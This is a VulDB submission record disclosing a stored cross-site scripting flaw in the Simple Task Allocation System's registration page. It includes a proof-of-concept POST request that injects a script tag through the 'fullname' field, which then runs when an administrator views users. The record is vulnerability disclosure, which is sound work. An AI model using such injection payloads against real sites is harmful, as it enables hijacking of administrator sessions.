| Title | Task Allocation System XSS registration.php vulnerability |
|---|
| Description | Task Allocation System has a stored XSS vulnerability. Attackers can register a user with a malicious 'Fullname', which will trigger XSS when administrator view the USER page.
POC below:
POST /alloc/LoginRegistration.php?a=register_user HTTP/1.1
formToken=%242y%2410%24wjjCbM.1OSA%2F7kW6k8R8TO744F40ncpRrdPKEAbKbZUPQF2ZbLIwC&fullname=%3Cscript%3Ealert('foo')%3C%2Fscript%3E&username=test2&password=test2 |
|---|
| Source | ⚠️ https://www.sourcecodester.com/php/16358/simple-task-allocation-system-using-php-and-sqlite-source-code-free-download.html |
|---|
| User | WWesleywww (UID 43117) |
|---|
| Submission | 03/28/2023 13:45 (3 years ago) |
|---|
| Moderation | 03/28/2023 22:38 (9 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 224244 [SourceCodester Simple Task Allocation System 1.0 LoginRegistration.php?a=register_user Fullname cross site scripting] |
|---|
| Points | 20 |
|---|